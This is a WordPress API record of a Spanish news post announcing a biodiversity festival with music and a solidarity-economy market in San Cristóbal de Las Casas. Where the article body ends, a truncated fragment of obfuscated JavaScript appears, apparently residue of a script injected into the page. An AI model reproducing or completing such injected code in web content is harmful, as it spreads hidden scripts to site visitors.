{"id":22159,"date":"2025-05-30T04:02:44","date_gmt":"2025-05-30T04:02:44","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22159"},"modified":"2025-05-30T04:02:45","modified_gmt":"2025-05-30T04:02:45","slug":"invitan-al-festival-de-la-biodiversidad-en-sclc-con-musica-arte-y-economia-solidaria","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22159","title":{"rendered":"Invitan al Festival de la Biodiversidad en SCLC con m\u00fasica, arte y econom\u00eda solidaria"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"656\" height=\"613\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143238.jpg\" alt=\"\" class=\"wp-image-22160\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143238.jpg 656w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000143238-300x280.jpg 300w\" sizes=\"auto, (max-width: 656px) 100vw, 656px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ corresponsal<br>29 de mayo del 2025. San Crist\u00f3bal de Las Casas.- La organizaci\u00f3n Tumin San Crist\u00f3bal invita a toda la comunidad al Festival de la Biodiversidad, que se celebrar\u00e1 este 1 de junio en la Calle Ej\u00e9rcito Nacional n\u00famero 12, en el Barrio del Cerrillo.<\/p>\n\n\n\n<p>El festival dar\u00e1 inicio con una oferta variada de actividades culturales y art\u00edsticas, pensadas para disfrutar en familia. A las 11:00 de la ma\u00f1ana se presentar\u00e1 el espect\u00e1culo \u201cCanto y M\u00fasica con Isa\u00ed\u201d, seguido por Consu, canci\u00f3n latina, a la 1:30 de la tarde, quien llenar\u00e1 el espacio con ritmos que celebran la diversidad musical de nuestra regi\u00f3n.<\/p>\n\n\n\n<p>Durante toda la jornada se llevar\u00e1 a cabo un Tianguis de econom\u00eda solidaria Tumin\/Repasur, donde se podr\u00e1 adquirir una amplia variedad de productos locales, como artesan\u00edas, ilustraciones, alimentos, ropa, herbolaria, libros y muchas otras propuestas de peque\u00f1os productores y artistas independientes. El intercambio se realizar\u00e1 bajo esquemas de econom\u00eda alternativa como el Tumin, promoviendo el comercio justo y comunitario.<\/p>\n\n\n\n<p>Los organizadores destacan que el festival busca ser un espacio de encuentro donde la m\u00fasica, la cultura y el consumo responsable se unan para celebrar la biodiversidad y la vida en comunidad.<\/p>\n\n\n\n<p>\u201cD\u00e9jate llevar por el ritmo y la energ\u00eda de nuestros conciertos en vivo. Grupos locales llenar\u00e1n el festival con sonidos que celebran la naturaleza, la cultura y la vida en comunidad. \u00a1Ven a bailar, cantar y disfrutar en familia!\u201d, invitan los organizadores.<\/p>\n\n\n\n<p>La entrada es libre y se espera una jornada llena de alegr\u00eda, conciencia ecol\u00f3gica y participaci\u00f3n colectiva.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ corresponsal29 de mayo del 2025. San Crist\u00f3bal de Las Casas.- La organizaci\u00f3n Tumin San Crist\u00f3bal invita a toda la comunidad al Festival de la Biodiversidad, que se celebrar\u00e1 este 1 de junio en la Calle Ej\u00e9rcito Nacional n\u00famero 12, en el Barrio del Cerrillo. El festival dar\u00e1 inicio con una oferta variada de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22160,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-22159","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22159","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22159"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22159\/revisions"}],"predecessor-version":[{"id":22161,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22159\/revisions\/22161"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22160"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22159"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22159"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22159"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}